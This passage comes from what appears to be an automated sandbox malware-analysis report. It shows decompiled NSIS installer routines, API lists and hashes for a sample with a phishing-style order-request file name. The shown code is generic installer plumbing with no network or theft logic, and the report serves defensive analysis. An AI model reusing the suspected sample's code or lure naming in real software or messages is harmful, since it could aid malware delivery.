                                                              • ScreenToClient.USER32(?,?), ref: 00404A98
                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404AAA
                                                              • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404AD0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Similarity
                                                              • API ID: Message$Send$ClientScreen
                                                              • String ID: f
                                                              • API String ID: 41195575-1993550816
                                                              • Opcode ID: 96292700c6c1febd080c169329d2e770bb4f6d3abf554412e323a865936e6816
                                                              • Instruction ID: c6f788746afe21c260c1d9be26cb74e88d19e7ad1034c01b3b76a28530fb3a8b
                                                              • Opcode Fuzzy Hash: 96292700c6c1febd080c169329d2e770bb4f6d3abf554412e323a865936e6816
                                                              • Instruction Fuzzy Hash: 37019E71A4021CBADB00DB94DD81FFEBBFCAF54B10F10002BBA11B61C0C7B49A418BA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E00402D04(struct HWND__* _a4, intOrPtr _a8) {
                                                              				short _v132;
                                                              				int _t11;
                                                              				int _t20;
                                                              
                                                              				if(_a8 == 0x110) {
                                                              					SetTimer(_a4, 1, 0xfa, 0);
                                                              					_a8 = 0x113;
                                                              				}
                                                              				if(_a8 == 0x113) {
                                                              					_t20 =  *0x78b6f4; // 0x24cc4
                                                              					_t11 =  *0x7976fc; // 0x253b8
                                                              					if(_t20 >= _t11) {
                                                              						_t20 = _t11;
                                                              					}
                                                              					wsprintfW( &_v132, L"verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
                                                              					SetWindowTextW(_a4,  &_v132);
                                                              					SetDlgItemTextW(_a4, 0x406,  &_v132);
                                                              				}
                                                              				return 0;
                                                              			}






                                                              0x00402d14
                                                              0x00402d22
                                                              0x00402d28
                                                              0x00402d28
                                                              0x00402d36
                                                              0x00402d38
                                                              0x00402d3e
                                                              0x00402d45
                                                              0x00402d47
                                                              0x00402d47
                                                              0x00402d5d
                                                              0x00402d6d
                                                              0x00402d7f
                                                              0x00402d7f
                                                              0x00402d87

                                                              APIs
                                                              • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402D22
                                                              • MulDiv.KERNEL32(00024CC4,00000064,000253B8), ref: 00402D4D
                                                              • wsprintfW.USER32 ref: 00402D5D
                                                              • SetWindowTextW.USER32(?,?), ref: 00402D6D
                                                              • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402D7F
                                                              Strings
                                                              • verifying installer: %d%%, xrefs: 00402D57
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Similarity
                                                              • API ID: Text$ItemTimerWindowwsprintf
                                                              • String ID: verifying installer: %d%%
                                                              • API String ID: 1451636040-82062127
                                                              • Opcode ID: 0571604055d31c6dff79b789c0d870111b8eec90378702650be5945f1294d07a
                                                              • Instruction ID: d409429b390960081b576047ff97edc042c2651f1908c05eaab55558fb75af6b
                                                              • Opcode Fuzzy Hash: 0571604055d31c6dff79b789c0d870111b8eec90378702650be5945f1294d07a
                                                              • Instruction Fuzzy Hash: 1B01447064020DAFEF149F61DD49BEA3B69AF04304F008039FA45A91D0DBB89955CB58
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 86%
                                                              			E100022D0(void* __edx) {
                                                              				void* _t38;
                                                              				signed int _t39;
                                                              				void* _t40;
                                                              				void* _t42;
                                                              				signed int* _t43;
                                                              				signed int* _t51;
                                                              				void* _t52;
                                                              				void* _t54;
                                                              
                                                              				 *(_t54 + 0x10) = 0 |  *((intOrPtr*)( *((intOrPtr*)(_t54 + 8)) + 0x1014)) > 0x00000000;
                                                              				while(1) {
                                                              					_t9 =  *((intOrPtr*)(_t54 + 0x18)) + 0x1018; // 0x1018
                                                              					_t51 = ( *(_t54 + 0x10) << 5) + _t9;
                                                              					_t52 = _t51[6];
                                                              					if(_t52 == 0) {
                                                              						goto L9;
                                                              					}
                                                              					_t42 = 0x1a;
                                                              					if(_t52 == _t42) {
                                                              						goto L9;
                                                              					}
                                                              					if(_t52 != 0xffffffff) {
                                                              						if(_t52 <= 0 || _t52 > 0x19) {
                                                              							_t51[6] = _t42;
                                                              							goto L12;
                                                              						} else {
                                                              							_t38 = E100012BA(_t52 - 1);
                                                              							L10:
                                                              							goto L11;
                                                              						}
                                                              					} else {
                                                              						_t38 = E10001243();
                                                              						L11:
                                                              						_t52 = _t38;
                                                              						L12:
                                                              						_t13 =  &(_t51[2]); // 0x1020
                                                              						_t43 = _t13;
                                                              						if(_t51[1] != 0xffffffff) {
                                                              						}
                                                              						_t39 =  *_t51;
                                                              						_t51[7] = _t51[7] & 0x00000000;
                                                              						if(_t39 > 7) {
                                                              							L27:
                                                              							_t40 = GlobalFree(_t52);
                                                              							if( *(_t54 + 0x10) == 0) {
                                                              								return _t40;
                                                              							}
                                                              							if( *(_t54 + 0x10) !=  *((intOrPtr*)( *((intOrPtr*)(_t54 + 0x18)) + 0x1014))) {
                                                              								 *(_t54 + 0x10) =  *(_t54 + 0x10) + 1;
                                                              							} else {
                                                              								 *(_t54 + 0x10) =  *(_t54 + 0x10) & 0x00000000;
                                                              							}
                                                              							continue;
                                                              						} else {
                                                              							switch( *((intOrPtr*)(_t39 * 4 +  &M1000244C))) {
                                                              								case 0:
                                                              									 *_t43 =  *_t43 & 0x00000000;
                                                              									goto L27;
                                                              								case 1:
                                                              									__eax = E10001311(__ebp);
                                                              									goto L21;
                                                              								case 2:
                                                              									 *__edi = E10001311(__ebp);
                                                              									__edi[1] = __edx;
                                                              									goto L27;
                                                              								case 3:
                                                              									__eax = GlobalAlloc(0x40,  *0x1000406c);
                                                              									 *(__esi + 0x1c) = __eax;
                                                              									__edx = 0;
                                                              									 *__edi = __eax;
                                                              									__eax = WideCharToMultiByte(0, 0, __ebp,  *0x1000406c, __eax,  *0x1000406c, 0, 0);
                                                              									goto L27;
                                                              								case 4:
                                                              									__eax = E1000122C(__ebp);
                                                              									 *(__esi + 0x1c) = __eax;
                                                              									L21:
                                                              									 *__edi = __eax;
                                                              									goto L27;
                                                              								case 5:
                                                              									__eax = GlobalAlloc(0x40, 0x10);
                                                              									_push(__eax);
                                                              									 *(__esi + 0x1c) = __eax;
                                                              									_push(__ebp);
                                                              									 *__edi = __eax;
                                                              									__imp__CLSIDFromString();
                                                              									goto L27;
                                                              								case 6:
                                                              									if(lstrlenW(__ebp) > 0) {
                                                              										__eax = E10001311(__ebp);
                                                              										 *__ebx = __eax;
                                                              									}
                                                              									goto L27;
                                                              								case 7:
                                                              									 *(__esi + 0x18) =  *(__esi + 0x18) - 1;
                                                              									( *(__esi + 0x18) - 1) *  *0x1000406c =  *0x10004074 + ( *(__esi + 0x18) - 1) *  *0x1000406c * 2 + 0x18;
                                                              									 *__ebx =  *0x10004074 + ( *(__esi + 0x18) - 1) *  *0x1000406c * 2 + 0x18;
                                                              									asm("cdq");
                                                              									__eax = E10001470(__edx,  *0x10004074 + ( *(__esi + 0x18) - 1) *  *0x1000406c * 2 + 0x18, __edx,  *0x10004074 + ( *(__esi + 0x18) - 1) *  *0x1000406c * 2);
                                                              									goto L27;
                                                              							}
                                                              						}
                                                              					}
                                                              					L9:
                                                              					_t38 = E1000122C(0x10004044);
                                                              					goto L10;
                                                              				}
                                                              			}











                                                              0x100022e4
                                                              0x100022e8
                                                              0x100022f3
                                                              0x100022f3
                                                              0x100022fa
                                                              0x100022ff
                                                              0x00000000
                                                              0x00000000
                                                              0x10002303
                                                              0x10002306
                                                              0x00000000
                                                              0x00000000
                                                              0x1000230b
                                                              0x10002316
                                                              0x10002326
                                                              0x00000000
                                                              0x1000231d
                                                              0x1000231f
                                                              0x10002335
                                                              0x00000000
                                                              0x10002335
                                                              0x1000230d
                                                              0x1000230d
                                                              0x10002336
                                                              0x10002336
                                                              0x10002338
                                                              0x1000233c
                                                              0x1000233c
                                                              0x1000233f
                                                              0x1000233f
                                                              0x10002347
                                                              0x10002349
                                                              0x10002350
                                                              0x10002415
                                                              0x10002416
                                                              0x10002421
                                                              0x1000244b
                                                              0x1000244b
                                                              0x10002431
                                                              0x1000243d
                                                              0x10002433
                                                              0x10002433
                                                              0x10002433
                                                              0x00000000
                                                              0x10002356
                                                              0x10002356
                                                              0x00000000
                                                              0x1000235d
                                                              0x00000000
                                                              0x00000000
                                                              0x10002366
                                                              0x00000000
                                                              0x00000000
                                                              0x10002374
                                                              0x10002376
                                                              0x00000000
                                                              0x00000000
                                                              0x10002397
                                                              0x1000239d
                                                              0x100023a0
                                                              0x100023a2
                                                              0x100023b2
                                                              0x00000000
                                                              0x00000000
                                                              0x1000237f
                                                              0x10002384
                                                              0x10002387
                                                              0x10002388
                                                              0x00000000
                                                              0x00000000
                                                              0x100023be
                                                              0x100023c4
                                                              0x100023c5
                                                              0x100023c8
                                                              0x100023c9
                                                              0x100023cb
                                                              0x00000000
                                                              0x00000000
                                                              0x100023dc
                                                              0x100023df
                                                              0x100023eb
                                                              0x100023ed
                                                              0x00000000
                                                              0x00000000
                                                              0x100023f9
                                                              0x10002405
                                                              0x10002408
                                                              0x1000240a
                                                              0x1000240d
                                                              0x00000000
                                                              0x00000000
                                                              0x10002356
                                                              0x10002350
                                                              0x1000232b
                                                              0x10002330
                                                              0x00000000
                                                              0x10002330

                                                              APIs
                                                              • GlobalFree.KERNEL32(00000000), ref: 10002416
                                                                • Part of subcall function 1000122C: lstrcpynW.KERNEL32(00000000,?,100012DF,00000019,100011BE,-000000A0), ref: 1000123C
                                                              • GlobalAlloc.KERNEL32(00000040), ref: 10002397
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023B2
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63200218360.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000001.00000002.63200192081.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.63200243775.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.63200269821.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_10000000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Similarity
                                                              • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                              • String ID:
                                                              • API String ID: 4216380887-0
                                                              • Opcode ID: 629548a8d80b156119ca260ddfff41e2ac9599e7dc7e49857da4672f8da03f10
                                                              • Instruction ID: a8798eece1b67337def5fc6f06e905ed3cc6fca3e5836deafc22007a072d802d
                                                              • Opcode Fuzzy Hash: 629548a8d80b156119ca260ddfff41e2ac9599e7dc7e49857da4672f8da03f10
                                                              • Instruction Fuzzy Hash: A14190B1508305EFF320DF24D885AAA77F8FB883D0F50452DF9468619ADB34AA54DB61
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 76%
                                                              			E100024A9(intOrPtr* _a4) {
                                                              				intOrPtr _v4;
                                                              				intOrPtr* _t24;
                                                              				void* _t26;
                                                              				intOrPtr _t27;
                                                              				signed int _t35;
                                                              				void* _t39;
                                                              				intOrPtr _t40;
                                                              				void* _t43;
                                                              
                                                              				_t39 = E1000121B();
                                                              				_t24 = _a4;
                                                              				_t40 =  *((intOrPtr*)(_t24 + 0x1014));
                                                              				_v4 = _t40;
                                                              				_t43 = (_t40 + 0x81 << 5) + _t24;
                                                              				do {
                                                              					if( *((intOrPtr*)(_t43 - 4)) != 0xffffffff) {
                                                              					}
                                                              					_t35 =  *(_t43 - 8);
                                                              					if(_t35 <= 7) {
                                                              						switch( *((intOrPtr*)(_t35 * 4 +  &M100025B9))) {
                                                              							case 0:
                                                              								 *_t39 =  *_t39 & 0x00000000;
                                                              								goto L15;
                                                              							case 1:
                                                              								_push( *__eax);
                                                              								goto L13;
                                                              							case 2:
                                                              								__eax = E10001470(__edx,  *__eax,  *((intOrPtr*)(__eax + 4)), __edi);
                                                              								goto L14;
                                                              							case 3:
                                                              								__ecx =  *0x1000406c;
                                                              								__edx = __ecx - 1;
                                                              								__eax = MultiByteToWideChar(0, 0,  *__eax, __ecx, __edi, __edx);
                                                              								__eax =  *0x1000406c;
                                                              								 *(__edi + __eax * 2 - 2) =  *(__edi + __eax * 2 - 2) & 0x00000000;
                                                              								goto L15;
                                                              							case 4:
                                                              								__eax = lstrcpynW(__edi,  *__eax,  *0x1000406c);
                                                              								goto L15;
                                                              							case 5:
                                                              								_push( *0x1000406c);
                                                              								_push(__edi);
                                                              								_push( *__eax);
                                                              								__imp__StringFromGUID2();
                                                              								goto L15;
                                                              							case 6:
                                                              								_push( *__esi);
                                                              								L13:
                                                              								__eax = wsprintfW(__edi, __ebp);
                                                              								L14:
                                                              								__esp = __esp + 0xc;
                                                              								goto L15;
                                                              						}
                                                              					}
                                                              					L15:
                                                              					_t26 =  *(_t43 + 0x14);
                                                              					if(_t26 != 0 && ( *_a4 != 2 ||  *((intOrPtr*)(_t43 - 4)) > 0)) {
                                                              						GlobalFree(_t26);
                                                              					}
                                                              					_t27 =  *((intOrPtr*)(_t43 + 0xc));
                                                              					if(_t27 != 0) {
                                                              						if(_t27 != 0xffffffff) {
                                                              							if(_t27 > 0) {
                                                              								E100012E1(_t27 - 1, _t39);
                                                              								goto L24;
                                                              							}
                                                              						} else {
                                                              							E10001272(_t39);
                                                              							L24:
                                                              						}
                                                              					}
                                                              					_v4 = _v4 - 1;
                                                              					_t43 = _t43 - 0x20;
                                                              				} while (_v4 >= 0);
                                                              				return GlobalFree(_t39);
                                                              			}











                                                              0x100024b3
                                                              0x100024b5
                                                              0x100024c4
                                                              0x100024ca
                                                              0x100024d7
                                                              0x100024d9
                                                              0x100024dd
                                                              0x100024dd
                                                              0x100024e5
                                                              0x100024eb
                                                              0x100024ed
                                                              0x00000000
                                                              0x100024f4
                                                              0x00000000
                                                              0x00000000
                                                              0x100024fa
                                                              0x00000000
                                                              0x00000000
                                                              0x10002504
                                                              0x00000000
                                                              0x00000000
                                                              0x1000250b
                                                              0x10002511
                                                              0x1000251d
                                                              0x10002523
                                                              0x10002528
                                                              0x00000000
                                                              0x00000000
                                                              0x1000254a
                                                              0x00000000
                                                              0x00000000
                                                              0x10002530
                                                              0x10002536
                                                              0x10002537
                                                              0x10002539
                                                              0x00000000
                                                              0x00000000
                                                              0x10002552
                                                              0x10002554
                                                              0x10002556
                                                              0x10002558
                                                              0x10002558
                                                              0x00000000
                                                              0x00000000
                                                              0x100024ed
                                                              0x1000255b
                                                              0x1000255b
                                                              0x10002560
                                                              0x10002572
                                                              0x10002572
                                                              0x10002578
                                                              0x1000257d
                                                              0x10002582
                                                              0x1000258e
                                                              0x10002593
                                                              0x00000000
                                                              0x10002598
                                                              0x10002584
                                                              0x10002585
                                                              0x10002599
                                                              0x10002599
                                                              0x10002582
                                                              0x1000259a
                                                              0x1000259e
                                                              0x100025a1
                                                              0x100025b8

                                                              APIs
                                                                • Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                              • GlobalFree.KERNEL32(?), ref: 10002572
                                                              • GlobalFree.KERNEL32(00000000), ref: 100025AD
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63200218360.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000001.00000002.63200192081.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.63200243775.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.63200269821.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_10000000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Similarity
                                                              • API ID: Global$Free$Alloc
                                                              • String ID:
                                                              • API String ID: 1780285237-0
                                                              • Opcode ID: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
                                                              • Instruction ID: 76257f5bf6759f365bfcd452de7d39bb0b2322773c3eba187a8a795e141f7608
                                                              • Opcode Fuzzy Hash: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
                                                              • Instruction Fuzzy Hash: 6831DE71504A21EFF321CF14CCA8E2B7BF8FB853D2F114529FA40961A8CB319851DB69
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 37%
                                                              			E00402840(void* __ebx) {
                                                              				void* _t26;
                                                              				long _t31;
                                                              				void* _t45;
                                                              				void* _t49;
                                                              				void* _t51;
                                                              				void* _t54;
                                                              				void* _t55;
                                                              				void* _t56;
                                                              
                                                              				_t45 = __ebx;
                                                              				 *((intOrPtr*)(_t56 - 0x48)) = 0xfffffd66;
                                                              				_t50 = E00402BBF(0xfffffff0);
                                                              				 *(_t56 - 0x38) = _t23;
                                                              				if(E00405A5D(_t50) == 0) {
                                                              					E00402BBF(0xffffffed);
                                                              				}
                                                              				E00405BE2(_t50);
                                                              				_t26 = E00405C07(_t50, 0x40000000, 2);
                                                              				 *(_t56 + 8) = _t26;
                                                              				if(_t26 != 0xffffffff) {
                                                              					_t31 =  *0x7a8a54;
                                                              					 *(_t56 - 8) = _t31;
                                                              					_t49 = GlobalAlloc(0x40, _t31);
                                                              					if(_t49 != _t45) {
                                                              						E00403235(_t45);
                                                              						E0040321F(_t49,  *(_t56 - 8));
                                                              						_t54 = GlobalAlloc(0x40,  *(_t56 - 0x24));
                                                              						 *(_t56 - 0x34) = _t54;
                                                              						if(_t54 != _t45) {
                                                              							_push( *(_t56 - 0x24));
                                                              							_push(_t54);
                                                              							_push(_t45);
                                                              							_push( *((intOrPtr*)(_t56 - 0x28)));
                                                              							E00403027();
                                                              							while( *_t54 != _t45) {
                                                              								_t47 =  *_t54;
                                                              								_t55 = _t54 + 8;
                                                              								 *(_t56 - 0x4c) =  *_t54;
                                                              								E00405BC2( *((intOrPtr*)(_t54 + 4)) + _t49, _t55, _t47);
                                                              								_t54 = _t55 +  *(_t56 - 0x4c);
                                                              							}
                                                              							GlobalFree( *(_t56 - 0x34));
                                                              						}
                                                              						E00405CB9( *(_t56 + 8), _t49,  *(_t56 - 8));
                                                              						GlobalFree(_t49);
                                                              						_push(_t45);
                                                              						_push(_t45);
                                                              						_push( *(_t56 + 8));
                                                              						_push(0xffffffff);
                                                              						 *((intOrPtr*)(_t56 - 0x48)) = E00403027();
                                                              					}
                                                              					CloseHandle( *(_t56 + 8));
                                                              				}
                                                              				_t51 = 0xfffffff3;
                                                              				if( *((intOrPtr*)(_t56 - 0x48)) < _t45) {
                                                              					_t51 = 0xffffffef;
                                                              					DeleteFileW( *(_t56 - 0x38));
                                                              					 *((intOrPtr*)(_t56 - 4)) = 1;
                                                              				}
                                                              				_push(_t51);
                                                              				E00401423();
                                                              				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t56 - 4));
                                                              				return 0;
                                                              			}











                                                              0x00402840
                                                              0x00402842
                                                              0x0040284e
                                                              0x00402851
                                                              0x0040285b
                                                              0x0040285f
                                                              0x0040285f
                                                              0x00402865
                                                              0x00402872
                                                              0x0040287a
                                                              0x0040287d
                                                              0x00402883
                                                              0x00402891
                                                              0x00402896
                                                              0x0040289a
                                                              0x0040289d
                                                              0x004028a6
                                                              0x004028b2
                                                              0x004028b6
                                                              0x004028b9
                                                              0x004028bb
                                                              0x004028be
                                                              0x004028bf
                                                              0x004028c0
                                                              0x004028c3
                                                              0x004028e2
                                                              0x004028ca
                                                              0x004028cf
                                                              0x004028d7
                                                              0x004028da
                                                              0x004028df
                                                              0x004028df
                                                              0x004028e9
                                                              0x004028e9
                                                              0x004028f6
                                                              0x004028fc
                                                              0x00402902
                                                              0x00402903
                                                              0x00402904
                                                              0x00402907
                                                              0x0040290e
                                                              0x0040290e
                                                              0x00402914
                                                              0x00402914
                                                              0x0040291f
                                                              0x00402920
                                                              0x00402924
                                                              0x00402928
                                                              0x0040292e
                                                              0x0040292e
                                                              0x00402935
                                                              0x004021dc
                                                              0x00402a4f
                                                              0x00402a5b

                                                              APIs
                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402894
                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004028B0
                                                              • GlobalFree.KERNEL32(?), ref: 004028E9
                                                              • GlobalFree.KERNEL32(00000000), ref: 004028FC
                                                              • CloseHandle.KERNEL32(?), ref: 00402914
                                                              • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402928
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Similarity
                                                              • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                              • String ID:
                                                              • API String ID: 2667972263-0
                                                              • Opcode ID: 598869ac1d0c0d8c1f48ea91ef13a2e3ea5b07d01dc90d54694cccaa19b6dd20
                                                              • Instruction ID: a3a02304b7bf1fff1c024f37f895186886f0ecb363175dbf1b7b9d1a7e5804fa
                                                              • Opcode Fuzzy Hash: 598869ac1d0c0d8c1f48ea91ef13a2e3ea5b07d01dc90d54694cccaa19b6dd20
                                                              • Instruction Fuzzy Hash: 3221A072800114BBDF216FA5CE49D9E7E79EF09324F24423AF550762E1CB795E41CB98
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 88%
                                                              			E00402537(int __ebx, void* __edx, intOrPtr* __esi) {
                                                              				signed int _t13;
                                                              				int _t16;
                                                              				int _t23;
                                                              				signed int _t28;
                                                              				intOrPtr* _t31;
                                                              				void* _t33;
                                                              				void* _t34;
                                                              				void* _t37;
                                                              				signed int _t39;
                                                              
                                                              				_t31 = __esi;
                                                              				_t23 = __ebx;
                                                              				_t13 =  *(_t34 - 0x24);
                                                              				_t37 = __edx - 0x38;
                                                              				 *(_t34 - 0x34) = _t13;
                                                              				_t26 = 0 | _t37 == 0x00000000;
                                                              				_t28 = _t37 == 0;
                                                              				if(_t13 == __ebx) {
                                                              					if(__edx != 0x38) {
                                                              						_t16 = lstrlenW(E00402BBF(0x11)) + _t15;
                                                              					} else {
                                                              						E00402BBF(0x21);
                                                              						WideCharToMultiByte(__ebx, __ebx, "C:\Users\Arthur\AppData\Local\Temp\nspD224.tmp", 0xffffffff, "C:\Users\Arthur\AppData\Local\Temp\nspD224.tmp\System.dll", 0x400, __ebx, __ebx);
                                                              						_t16 = lstrlenA("C:\Users\Arthur\AppData\Local\Temp\nspD224.tmp\System.dll");
                                                              					}
                                                              				} else {
                                                              					E00402BA2(1);
                                                              					 *0x40adc8 = __ax;
                                                              				}
                                                              				 *(_t34 + 8) = _t16;
                                                              				if( *_t31 == _t23) {
                                                              					L13:
                                                              					 *((intOrPtr*)(_t34 - 4)) = 1;
                                                              				} else {
                                                              					_t33 = E00405F92(_t26, _t31);
                                                              					if((_t28 |  *(_t34 - 0x34)) != 0 ||  *((intOrPtr*)(_t34 - 0x20)) == _t23 || E00405CE8(_t33, _t33) >= 0) {
                                                              						_t13 = E00405CB9(_t33, "C:\Users\Arthur\AppData\Local\Temp\nspD224.tmp\System.dll",  *(_t34 + 8));
                                                              						_t39 = _t13;
                                                              						if(_t39 == 0) {
                                                              							goto L13;
                                                              						}
                                                              					} else {
                                                              						goto L13;
                                                              					}
                                                              				}
                                                              				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t34 - 4));
                                                              				return 0;
                                                              			}












                                                              0x00402537
                                                              0x00402537
                                                              0x00402537
                                                              0x0040253c
                                                              0x0040253f
                                                              0x00402542
                                                              0x00402547
                                                              0x00402549
                                                              0x00402565
                                                              0x004025a3
                                                              0x00402567
                                                              0x00402569
                                                              0x00402583
                                                              0x0040258e
                                                              0x0040258e
                                                              0x0040254b
                                                              0x0040254d
                                                              0x00402552
                                                              0x0040255f
                                                              0x004025a8
                                                              0x004025ab
                                                              0x0040281e
                                                              0x0040281e
                                                              0x004025b1
                                                              0x004025ba
                                                              0x004025bc
                                                              0x004025db
                                                              0x004015ac
                                                              0x004015ae
                                                              0x00000000
                                                              0x004015b4
                                                              0x00000000
